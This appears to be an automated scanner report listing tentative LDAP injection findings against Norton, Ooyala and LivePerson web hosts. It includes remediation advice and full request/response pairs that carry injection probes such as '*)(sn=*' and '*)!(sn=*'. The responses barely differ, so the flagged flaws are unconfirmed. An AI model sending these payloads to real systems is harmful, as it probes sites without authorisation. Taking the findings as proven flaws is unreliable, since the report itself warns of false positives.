LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


1.1. https://onlinefamily.norton.com/familysafety/basicpremium.fs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://onlinefamily.norton.com
Path:   /familysafety/basicpremium.fs

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads 2e38829777b43edb)(sn=* and 2e38829777b43edb)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /familysafety/2e38829777b43edb)(sn=* HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:45:51 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:51 GMT; Path=/
Set-Cookie: JSESSIONID=C2C885DF4F91960B21A89E36D3D5E6F7; Path=/familysafety
Content-Length: 1420
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding








<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Norton Online Family</title>
   <link rel="shortcut icon" type="image/x-icon" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/favicon.ico" />
   <link rel="stylesheet" type="text/css" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/css/norton-family-safety.css" />
   <style type="text/css">                    
       h2 {
           font-size:32px;
       }
       p {
           font-size:15px;
       }
       h2,p {
           margin:1.2em 0;
       }
       #wrap {
           width:1000px;
           min-height:480px;
           *height:480px;
           margin:0 auto;
           background: url(https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/buddy_crossingGuard.gif) no-repeat 0 100px;
       }
   </style>
   <script type="text/javascript">
       if(window.parent.location != document.location)
       {
           window.parent.location = document.location;
       }        
   </script>    
</head>

<body>
   <div id="wrap">
       <div style="padding:150px 0 0 360px;">
           <h2>Sorry, this page is not found.</h2>
           <p>The page you are looking for might have been removed or is temporarily unavailable.</p>
           <p><a href="javascript:history.go(-1);">Click here to go back to the previous page</a></p>
           
           
   
           
           
       </div>
   </div>
</body>
</html>

Request 2

GET /familysafety/2e38829777b43edb)!(sn=* HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:45:52 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:52 GMT; Path=/
Content-Length: 1420
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding








<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Norton Online Family</title>
   <link rel="shortcut icon" type="image/x-icon" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/favicon.ico" />
   <link rel="stylesheet" type="text/css" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/css/norton-family-safety.css" />
   <style type="text/css">                    
       h2 {
           font-size:32px;
       }
       p {
           font-size:15px;
       }
       h2,p {
           margin:1.2em 0;
       }
       #wrap {
           width:1000px;
           min-height:480px;
           *height:480px;
           margin:0 auto;
           background: url(https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/buddy_crossingGuard.gif) no-repeat 0 100px;
       }
   </style>
   <script type="text/javascript">
       if(window.parent.location != document.location)
       {
           window.parent.location = document.location;
       }        
   </script>    
</head>

<body>
   <div id="wrap">
       <div style="padding:150px 0 0 360px;">
           <h2>Sorry, this page is not found.</h2>
           <p>The page you are looking for might have been removed or is temporarily unavailable.</p>
           <p><a href="javascript:history.go(-1);">Click here to go back to the previous page</a></p>
           
           
   
           
           
       </div>
   </div>
</body>
</html>

1.2. http://player.ooyala.com/player.js [height parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The height parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the height parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /player.js?width=356&height=*)(sn=*&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response 1

HTTP/1.1 200 OK
Last-Modified: Fri, 09 Sep 2011 21:26:25 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-2b01f44a
X-Pad: avoid browser bug
Content-Length: 25976
Cache-Control: private, max-age=300
Date: Fri, 09 Sep 2011 21:26:26 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
="iphone";}if(H){L="ipad";}if(C){L="android";}var P="http://player.ooyala.com/mobile_player.js?embedCodes=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&expires=1315641600&height=0&locale=en-US&playerId=ooyalaPlayer434126523_10kbk3a&rootItemEmbedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&signature=bdlRvCl0lGMCXqu1NQ3yMjViV6g03sK3MpF9NIg4Jgw&video_pcode=w1c2U6fqVnqafrMhiALawYi9UUck&width=356&wmode=transparent&device="+L;var e={getCurrentEmbedScript:function(){if(window.ooyalaActiveScript){return window.ooyalaActiveScript;}var i=document.getElementsByTagName("script");return i[i.length-1];},getQueryStringParams:function(U){if(U===null){return{};}var Z=U.split("?",2);var Y={};if(Z.length===2){var aa=Z[1].split("&");var W;for(W=0;W<aa.length;++W){var T=aa[W].indexOf("=");if(T>=1){var V=aa[W].substring(0,T);var X=aa[W].substring(T+1,aa[W].length);Y[V]=X;}}}return Y;},getThruParamQueryString:function(V){var U;if(V===null){return"";}var T=[];var i=/^thruParam_(.*)/;for(U in V){if(V.hasOwnProperty(U)&&i.test(U)){T.push(U+"="+V[U]);}}return T.join("&");},gup:function(U,T){if(U===null){return"";}T=T.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var i="[\\?&]"+T+"=([^&#]*)";var W=new RegExp(i);var V=W.exec(U);if(V===null){return"";}else{return V[1];}},createContainerDiv:function(V,U,i,T){var W=document.createElement("div");W.style.width=U+"px";W.style.height=i+"px";W.style.overflow="hidden";W.setAttribute("id",V);if(T){W.setAttribute("class",T);}return W;},replaceElement:function(i,V,U){var X=i?document.getElementById(i):null;if(X){X.innerHTML="";X.appendChild(U);}else{if(document.body){if(typeof(V.parentNode.insertBefore)==="function"){V.parentNode.insertBefore(U,V);}else{var W="containerDiv"+new Date().getTime();document.write("<div id='"+W+"'></div>");var T=document.getElementById(W);T.appendChild(U);}}else{document.write("<body></body>");document.body.appendChild(U);}}},loadScript:function(U,W){var i=document.createElement("script");i.type="text/javascript";i.src=U;if(W){i.onload=W;}var 
V=null;var T=window.document.getElementsByTagName("head");if(T){V=T[0];}else{V=window.document.childNodes[0].childNodes[0]||window.document.childNodes[0];}if(V){V.appendChild(i);}return i;},mergeObjects:func
...[SNIP]...

Request 2

GET /player.js?width=356&height=*)!(sn=*&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response 2

HTTP/1.1 200 OK
Last-Modified: Fri, 09 Sep 2011 21:26:26 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-cfd6a4a3
X-Pad: avoid browser bug
Content-Length: 26000
Cache-Control: private, max-age=300
Date: Fri, 09 Sep 2011 21:26:27 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
="iphone";}if(H){L="ipad";}if(C){L="android";}var P="http://player.ooyala.com/mobile_player.js?embedCodes=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&expires=1315641600&height=0&locale=en-US&playerId=ooyalaPlayer723342756_10kbk3b&rootItemEmbedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&signature=qy1TVnNRkIaAk3DIEJXYxG8EmEV0w4W9%2BQyBYG%2BD2tQ&video_pcode=w1c2U6fqVnqafrMhiALawYi9UUck&width=356&wmode=transparent&device="+L;var e={getCurrentEmbedScript:function(){if(window.ooyalaActiveScript){return window.ooyalaActiveScript;}var i=document.getElementsByTagName("script");return i[i.length-1];},getQueryStringParams:function(U){if(U===null){return{};}var Z=U.split("?",2);var Y={};if(Z.length===2){var aa=Z[1].split("&");var W;for(W=0;W<aa.length;++W){var T=aa[W].indexOf("=");if(T>=1){var V=aa[W].substring(0,T);var X=aa[W].substring(T+1,aa[W].length);Y[V]=X;}}}return Y;},getThruParamQueryString:function(V){var U;if(V===null){return"";}var T=[];var i=/^thruParam_(.*)/;for(U in V){if(V.hasOwnProperty(U)&&i.test(U)){T.push(U+"="+V[U]);}}return T.join("&");},gup:function(U,T){if(U===null){return"";}T=T.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var i="[\\?&]"+T+"=([^&#]*)";var W=new RegExp(i);var V=W.exec(U);if(V===null){return"";}else{return V[1];}},createContainerDiv:function(V,U,i,T){var W=document.createElement("div");W.style.width=U+"px";W.style.height=i+"px";W.style.overflow="hidden";W.setAttribute("id",V);if(T){W.setAttribute("class",T);}return W;},replaceElement:function(i,V,U){var X=i?document.getElementById(i):null;if(X){X.innerHTML="";X.appendChild(U);}else{if(document.body){if(typeof(V.parentNode.insertBefore)==="function"){V.parentNode.insertBefore(U,V);}else{var W="containerDiv"+new Date().getTime();document.write("<div id='"+W+"'></div>");var T=document.getElementById(W);T.appendChild(U);}}else{document.write("<body></body>");document.body.appendChild(U);}}},loadScript:function(U,W){var i=document.createElement("script");i.type="text/javascript";i.src=U;if(W){i.onload=W;}var 
V=null;var T=window.document.getElementsByTagName("head");if(T){V=T[0];}else{V=window.document.childNodes[0].childNodes[0]||window.document.childNodes[0];}if(V){V.appendChild(i);}return i;},mergeObjects:
...[SNIP]...

1.3. http://sales.liveperson.net/hc/2735064/ [PV%21pageLoadTime parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The PV%21pageLoadTime parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the PV%21pageLoadTime parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=772257181582-563438479788&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=*)(sn=*&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:35:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:35:11 GMT; path=/hc/2735064; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:35:11 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"772257181582-563438479788","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

Request 2

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=772257181582-563438479788&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=*)!(sn=*&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:35:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:35:12 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"772257181582-563438479788","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

1.4. http://sales.liveperson.net/hc/2735064/ [SV%21language parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The SV%21language parameter appears to be vulnerable to LDAP injection attacks.

The payloads cee83379ee2249f6)(sn=* and cee83379ee2249f6)!(sn=* were each submitted in the SV%21language parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=729815930360-803452320629&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Aupgrades%20%26%20renewals%3Aupgraderenewal&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=cee83379ee2249f6)(sn=*&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=CFE83898-5BB0-075A-37F1-7545D477147F&SV%21partner=store%3Asymantec&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603886325

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; expires=Sat, 08-Sep-2012 21:36:08 GMT; path=/hc/2735064; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:08 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"729815930360-803452320629","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

Request 2

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=729815930360-803452320629&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Aupgrades%20%26%20renewals%3Aupgraderenewal&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=cee83379ee2249f6)!(sn=*&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=CFE83898-5BB0-075A-37F1-7545D477147F&SV%21partner=store%3Asymantec&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603886325

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:09 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"729815930360-803452320629","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

1.5. http://sales.liveperson.net/hc/2735064/ [defInvite parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The defInvite parameter appears to be vulnerable to LDAP injection attacks.

The payloads 23e555a7c9acdf94)(sn=* and 23e555a7c9acdf94)!(sn=* were each submitted in the defInvite parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/2735064/?&site=2735064&cmd=mTagInviteTimeout&lpCallId=243824564852-218836609740&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=23e555a7c9acdf94)(sn=*&activePlugin=none&cobrowse=true&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&timeout=120&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315604066248

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:37:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:37:49 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:1315604196:-1:-1; expires=Sat, 08-Sep-2012 21:37:49 GMT; path=/hc/2735064; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"243824564852-218836609740","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

Request 2

GET /hc/2735064/?&site=2735064&cmd=mTagInviteTimeout&lpCallId=243824564852-218836609740&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=23e555a7c9acdf94)!(sn=*&activePlugin=none&cobrowse=true&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&timeout=120&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315604066248

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:37:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:37:50 GMT
